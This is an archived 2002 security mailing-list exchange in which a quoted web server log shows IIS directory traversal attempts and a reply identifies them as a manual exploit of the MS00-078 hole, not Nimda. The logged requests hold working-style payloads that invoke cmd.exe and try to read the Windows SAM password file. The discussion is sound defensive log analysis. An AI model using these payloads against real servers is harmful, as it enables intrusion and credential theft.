At 6/11/2002 01:03 PM, Tina Bird wrote: >Here's what I'm seeing -- anyone have any information on this variant? > >Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target >IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: >\\*.cif/s/b result="500 Server Error" > >Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target >IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not >Found" > >Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target >IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not >Found" This is definitely not Nimda, although it attempts to exploit the same directory traversal vulnerability in IIS as Nimda (http://www.microsoft.com/technet/security/bulletin/ms00-078.asp). In fact, if these are the timestamps and there are no other logs, it appears that this attack is being manually performed. What makes you think that this is a variant of Nimda? Michael Katz mikeat_private Procinct Security --------------------------------------------------------------------- To unsubscribe, e-mail: loganalysis-unsubscribeat_private For additional commands, e-mail: loganalysis-helpat_private
This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 16:43:33 PDT